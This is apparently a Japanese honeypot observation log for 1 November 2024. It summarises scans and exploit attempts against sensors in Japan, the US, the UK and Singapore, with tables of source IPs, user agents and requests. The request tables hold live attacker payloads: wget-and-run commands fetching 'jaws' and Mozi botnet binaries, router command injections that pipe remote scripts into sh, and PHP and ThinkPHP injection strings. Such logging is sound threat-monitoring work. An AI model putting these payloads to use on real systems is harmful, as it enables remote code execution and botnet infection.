ハニーポット(仮) 観測記録 2024/11/01分です。
特徴
共通
Spring Bootの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
Location:JP
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
PHPの脆弱性(CVE-2024-4577)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Gulper Web Botによるスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 129.159.107.197/jaws; sh /tmp/jaws
Location:US
GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為
configファイルへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:UK
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性を狙うアクセス
.jsへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:SG
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為
Gh0stRATのような動き
を確認しました。
他
アクセス数推移
JP:総アクセス数:135 (前日比:-104)
US:総アクセス数:132 (前日比:-25)
UK:総アクセス数:92 (前日比:-95)
SG:総アクセス数:102 (前日比:-22)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 13.91.165.91 | United States |
| 1 | 20.43.231.11 | United States |
| 2 | 45.87.42.72 | Netherlands |
| 1 | 47.100.112.151 | China |
| 8 | 51.161.82.191 | Canada |
| 8 | 51.161.83.117 | Canada |
| 1 | 54.38.126.107 | France |
| 1 | 54.245.174.164 | United States |
| 1 | 80.75.212.46 | Ireland |
| 1 | 80.82.77.202 | United Kingdom |
| 1 | 87.120.115.119 | Bulgaria |
| 1 | 93.174.93.12 | United Kingdom |
| 11 | 101.32.192.203 | Singapore |
| 1 | 107.175.48.4 | United States |
| 45 | 130.61.142.19 | United States |
| 1 | 135.148.10.162 | United States |
| 1 | 139.59.12.132 | Singapore |
| 1 | 167.94.138.59 | United States |
| 1 | 172.212.58.224 | United Kingdom |
| 1 | 172.212.59.108 | United Kingdom |
| 1 | 172.245.189.22 | United States |
| 1 | 173.231.185.164 | United States |
| 1 | 178.211.139.105 | Poland |
| 1 | 178.215.238.85 | Bulgaria |
| 1 | 185.224.128.83 | Netherlands |
| 1 | 188.166.47.39 | United States |
| 35 | 194.238.27.87 | United Kingdom |
| 2 | 198.235.24.182 | United States |
| 1 | 206.168.34.123 | United States |
| 2 | 206.189.97.186 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 8 | - |
| 80 | Custom-AsyncHttpClient |
| 2 | Go-http-client/1.1 |
| 1 | Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot) |
| 1 | Hello World |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.84 Safari/537.36 |
| 1 | Mozilla/5.0 (OS/2; Warp 4.5; rv:31.0) Gecko/20100101 Firefox/31.0 SeaMonkey/2.28 |
| 11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 |
| 18 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0 |
| 2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 3 | Mozilla/5.0 zgrab/0.x |
| 1 | python-requests/2.25.1 |
| 1 | xfa1,nvdorz,nvd0rz |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | MGLNDD_18.179.20.5_80\n |
||
| 2 | \x16\x03\x01 |
||
| 2 | \x16\x03\x02\x01o\x01 |
||
| 1 | CONNECT | github[.]com:443 |
HTTP/1.1 |
| 19 | GET | /.env |
HTTP/1.1 |
| 4 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /.svn/wc.db |
HTTP/1.1 |
| 2 | GET | /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 2 | GET | /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /cgi-bin/luci/;stok=/locale |
HTTP/1.1 |
| 2 | GET | /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /command_port.ini |
HTTP/1.1 |
| 1 | GET | /containers/json |
HTTP/1.1 |
| 2 | GET | /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 4 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /index.php?lang=../../../../../../../../tmp/index1 |
HTTP/1.1 |
| 1 | GET | /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php |
HTTP/1.1 |
| 1 | GET | /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello |
HTTP/1.1 |
| 2 | GET | /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /lib/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /lib/phpunit/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /lib/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /login.rsp |
HTTP/1.1 |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /phpunit/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello |
HTTP/1.1 |
| 1 | GET | /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws |
|
| 2 | GET | /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /vendor/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/LICENSE/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /vendor/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /vicidial/welcome.php |
HTTP/1.0 |
| 1 | GET | /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | GET | /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 11 | HEAD | /Core/Skin/Login.aspx |
HTTP/1.1 |
| 2 | POST | /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh |
HTTP/1.1 |
| 2 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 2 | POST | /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input |
HTTP/1.1 |
| 2 | POST | /owa/auth.owa |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 4.151.36.251 | United States |
| 1 | 4.156.21.54 | United States |
| 1 | 4.255.100.242 | United States |
| 2 | 5.8.11.202 | Russia |
| 2 | 5.181.190.29 | Poland |
| 1 | 45.79.181.179 | United States |
| 2 | 45.141.84.16 | Russia |
| 1 | 45.149.241.114 | Bulgaria |
| 1 | 57.152.79.8 | Switzerland |
| 1 | 61.3.223.194 | India |
| 1 | 65.49.1.17 | United States |
| 1 | 80.75.212.46 | Ireland |
| 2 | 80.82.77.202 | United Kingdom |
| 1 | 87.120.113.55 | Bulgaria |
| 1 | 87.120.115.119 | Bulgaria |
| 1 | 87.120.126.202 | Bulgaria |
| 1 | 87.120.127.173 | Bulgaria |
| 4 | 92.255.57.58 | Hong Kong |
| 2 | 93.123.85.231 | Bulgaria |
| 2 | 93.174.93.12 | United Kingdom |
| 1 | 103.151.123.116 | Vietnam |
| 3 | 108.165.153.36 | United States |
| 1 | 108.165.153.37 | United States |
| 1 | 108.165.153.38 | United States |
| 1 | 117.235.117.33 | India |
| 1 | 117.253.211.184 | India |
| 1 | 134.209.233.95 | United States |
| 1 | 139.59.101.104 | Singapore |
| 1 | 142.93.1.91 | United States |
| 2 | 147.185.132.109 | United States |
| 2 | 147.185.132.129 | United States |
| 4 | 152.42.214.50 | United States |
| 8 | 152.42.219.47 | United States |
| 4 | 152.42.243.111 | United States |
| 2 | 152.42.243.206 | United States |
| 4 | 152.42.247.210 | United States |
| 2 | 159.223.69.51 | United States |
| 21 | 162.19.236.43 | France |
| 4 | 162.19.237.132 | France |
| 2 | 165.227.206.1 | United States |
| 2 | 167.94.145.109 | United States |
| 1 | 172.104.11.51 | United States |
| 1 | 172.168.40.219 | United States |
| 2 | 173.231.185.164 | United States |
| 3 | 178.211.139.105 | Poland |
| 1 | 178.215.236.240 | Bulgaria |
| 10 | 178.215.238.85 | Bulgaria |
| 4 | 185.16.38.232 | Poland |
| 6 | 185.224.128.83 | Netherlands |
| 2 | 198.235.24.15 | United States |
| 2 | 199.45.155.71 | United States |
| 3 | 216.218.206.66 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 52 | - |
| 3 | Go-http-client/1.1 |
| 10 | Hello World |
| 1 | Hello, World |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) XV6800 |
| 1 | Mozilla/5.0 (Linux; Android 6.0; Nexus 5X Build/MDB08L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36 |
| 4 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 YaBrowser/24.1.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15 |
| 3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 |
| 1 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 |
| 27 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Safari/537.36 OPR/80.0.4170.72 |
| 2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 1 | Mozilla/5.0 (iPhone; CPU iPhone OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/604.1 |
| 4 | Mozilla/5.0 zgrab/0.x |
| 13 | Mozilla/5.0 |
| 1 | python-requests/2.32.3 |
| 2 | xfa1,nvdorz,nvd0rz |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
| 1 | MGLNDD_34.68.118.83_80\n |
||
| 12 | \x16\x03\x01\x01\v\x01 |
||
| 1 | \x16\x03\x01\x02 |
||
| 1 | \x16\x03\x01\x05\xa8\x01 |
||
| 11 | \x16\x03\x01 |
||
| 6 | \x16\x03\x02\x01o\x01 |
||
| 1 | \x16\x03 |
||
| 1 | CONNECT | github[.]com:443 |
HTTP/1.1 |
| 30 | GET | /.env |
HTTP/1.1 |
| 5 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /.vscode/sftp.json |
HTTP/1.1 |
| 1 | GET | /?%3Cplay%3Ewithme%3C/%3E |
HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /admin/assets/js/views/login.js |
HTTP/1.0 |
| 1 | GET | /apifb/stats.php |
HTTP/1.1 |
| 13 | GET | /cdn-cgi/trace |
HTTP/1.1 |
| 12 | GET | /cgi-bin/luci/;stok=/locale |
HTTP/1.1 |
| 3 | GET | /command_port.ini |
HTTP/1.1 |
| 1 | GET | /config.json |
HTTP/1.1 |
| 1 | GET | /druid/index.html |
HTTP/1.1 |
| 3 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /geoserver/web/ |
HTTP/1.1 |
| 10 | GET | /login.rsp |
HTTP/1.1 |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /sftp-config.json |
HTTP/1.1 |
| 1 | GET | /vicidial/welcome.php |
HTTP/1.0 |
| 1 | GET | /webui/ |
HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 5.8.11.202 | Russia |
| 2 | 5.181.190.29 | Poland |
| 4 | 31.220.1.88 | Germany |
| 1 | 37.19.221.231 | United Kingdom |
| 1 | 40.118.213.55 | United States |
| 1 | 40.118.214.20 | United States |
| 1 | 45.79.172.21 | United States |
| 1 | 51.8.71.122 | Germany |
| 1 | 52.189.75.157 | United States |
| 1 | 64.62.156.95 | United States |
| 1 | 64.62.156.98 | United States |
| 1 | 64.62.156.107 | United States |
| 1 | 64.62.197.94 | United States |
| 2 | 80.75.212.46 | Ireland |
| 1 | 80.82.77.202 | United Kingdom |
| 1 | 87.120.115.119 | Bulgaria |
| 2 | 87.120.126.202 | Bulgaria |
| 1 | 91.238.181.20 | Germany |
| 3 | 92.255.57.58 | Hong Kong |
| 2 | 93.123.85.231 | Bulgaria |
| 1 | 93.174.93.12 | United Kingdom |
| 1 | 104.28.131.167 | United States |
| 1 | 104.40.75.39 | United States |
| 1 | 117.209.90.154 | India |
| 1 | 117.209.95.188 | India |
| 1 | 139.59.101.104 | Singapore |
| 2 | 152.42.214.50 | United States |
| 2 | 152.42.243.206 | United States |
| 2 | 152.42.247.210 | United States |
| 6 | 162.19.236.43 | France |
| 4 | 162.19.237.132 | France |
| 9 | 162.19.239.42 | France |
| 3 | 164.52.24.188 | China |
| 1 | 172.104.11.46 | United States |
| 1 | 172.105.128.11 | United States |
| 2 | 173.231.185.164 | United States |
| 2 | 178.211.139.105 | Poland |
| 1 | 178.215.236.240 | Bulgaria |
| 4 | 178.215.238.68 | Bulgaria |
| 1 | 182.127.7.162 | China |
| 3 | 185.16.38.232 | Poland |
| 3 | 185.224.128.83 | Netherlands |
| 1 | 192.99.7.195 | Canada |
| 2 | 198.235.24.147 | United States |
| 2 | 198.235.24.208 | United States |
| 2 | 199.45.154.124 | United States |
| 2 | 206.168.34.120 | United States |
| 2 | 206.189.97.186 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 33 | - |
| 7 | Go-http-client/1.1 |
| 5 | Hello World |
| 1 | Hello, World |
| 1 | Mozilla/5.0 (Linux; Android 10; Redmi Note 9 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 |
| 1 | Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 |
| 19 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 1 | Mozilla/5.0 (compatible; archive.org_bot +http[:]//www[.]archive[.]org/details/archive.org_bot) |
| 4 | Mozilla/5.0 zgrab/0.x |
| 5 | Mozilla/5.0 |
| 2 | xfa1,nvdorz,nvd0rz |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | MGLNDD_132.145.66.34_80\n |
||
| 1 | \x03 |
||
| 3 | \x16\x03\x01\x01\v\x01 |
||
| 1 | \x16\x03\x01\x02 |
||
| 1 | \x16\x03\x01\x05\xa8\x01 |
||
| 8 | \x16\x03\x01 |
||
| 3 | \x16\x03\x02\x01o\x01 |
||
| 1 | CONNECT | github[.]com:443 |
HTTP/1.1 |
| 22 | GET | /.env |
HTTP/1.1 |
| 2 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /admin/assets/js/views/login.js |
HTTP/1.0 |
| 1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
| 5 | GET | /cdn-cgi/trace |
HTTP/1.1 |
| 4 | GET | /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]87[.]69%2Ft+-O-+|+sh%60) |
HTTP/1.1 |
| 8 | GET | /cgi-bin/luci/;stok=/locale |
HTTP/1.1 |
| 2 | GET | /command_port.ini |
HTTP/1.1 |
| 1 | GET | /druid/index.html |
HTTP/1.1 |
| 5 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /geoserver/web/ |
HTTP/1.1 |
| 5 | GET | /login.rsp |
HTTP/1.1 |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//117[.]209[.]90[.]154:33864/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /sftp-config.json |
HTTP/1.1 |
| 1 | GET | /vicidial/welcome.php |
HTTP/1.0 |
| 1 | GET | /webui/ |
HTTP/1.1 |
| 1 | HEAD | /.env |
HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
| 2 | POST | /owa/auth.owa |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 3 | 5.8.11.202 | Russia |
| 1 | 5.181.190.29 | Poland |
| 1 | 13.64.49.182 | United States |
| 1 | 34.222.247.14 | United States |
| 1 | 45.9.168.216 | Hungary |
| 1 | 45.149.241.114 | Bulgaria |
| 1 | 51.8.223.192 | Germany |
| 1 | 52.228.153.245 | United States |
| 1 | 57.151.70.168 | Switzerland |
| 1 | 64.62.197.19 | United States |
| 1 | 64.62.197.20 | United States |
| 1 | 64.62.197.29 | United States |
| 1 | 66.175.213.4 | United States |
| 1 | 66.240.205.34 | United States |
| 2 | 71.6.134.230 | United States |
| 1 | 74.82.47.4 | United States |
| 3 | 80.75.212.46 | Ireland |
| 2 | 80.82.77.202 | United Kingdom |
| 1 | 87.120.115.119 | Bulgaria |
| 2 | 87.120.126.202 | Bulgaria |
| 3 | 92.255.57.58 | Hong Kong |
| 2 | 93.123.85.231 | Bulgaria |
| 1 | 93.174.93.12 | United Kingdom |
| 1 | 94.156.166.59 | Bulgaria |
| 2 | 103.147.184.29 | Vietnam |
| 1 | 147.45.112.8 | Russia |
| 2 | 152.42.219.47 | United States |
| 2 | 152.42.243.111 | United States |
| 2 | 159.223.69.51 | United States |
| 12 | 162.19.236.43 | France |
| 12 | 162.19.239.42 | France |
| 2 | 167.94.138.165 | United States |
| 1 | 168.253.90.155 | South Africa |
| 1 | 172.105.128.11 | United States |
| 1 | 172.168.41.136 | United States |
| 1 | 172.225.37.94 | United States |
| 2 | 173.231.185.164 | United States |
| 2 | 178.211.139.105 | Poland |
| 1 | 178.215.236.240 | Bulgaria |
| 7 | 178.215.238.85 | Bulgaria |
| 3 | 185.16.38.232 | Poland |
| 1 | 191.37.150.248 | Brazil |
| 2 | 198.235.24.86 | United States |
| 2 | 199.45.155.106 | United States |
| 2 | 205.210.31.128 | United States |
| 2 | 206.189.97.186 | United States |
| 1 | 213.109.67.90 | Kyrgyzstan |
| 4 | 223.244.235.136 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 31 | - |
| 3 | Go-http-client/1.1 |
| 9 | Hello World |
| 1 | Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Linux; Android 7.0; HUAWEI CAN-L11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 1083) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 |
| 4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 |
| 1 | Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 |
| 26 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0 |
| 2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 1 | Mozilla/5.0 Gecko/20100101 |
| 4 | Mozilla/5.0 zgrab/0.x |
| 3 | Mozilla/5.0 |
| 1 | python-requests/2.25.1 |
| 2 | xfa1,nvdorz,nvd0rz |
| 2 | xfa1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | Gh0st\xad |
||
| 1 | MGLNDD_13.67.44.234_80 |
||
| 1 | \x03 |
||
| 3 | \x16\x03\x01\x01\v\x01 |
||
| 1 | \x16\x03\x01\x02 |
||
| 1 | \x16\x03\x01\x05\xa8\x01 |
||
| 8 | \x16\x03\x01 |
||
| 6 | \x16\x03\x02\x01o\x01 |
||
| 1 | CONNECT | github[.]com:443 |
HTTP/1.1 |
| 30 | GET | /.env |
HTTP/1.1 |
| 3 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 3 | GET | /admin/assets/js/views/login.js |
HTTP/1.0 |
| 3 | GET | /cdn-cgi/trace |
HTTP/1.1 |
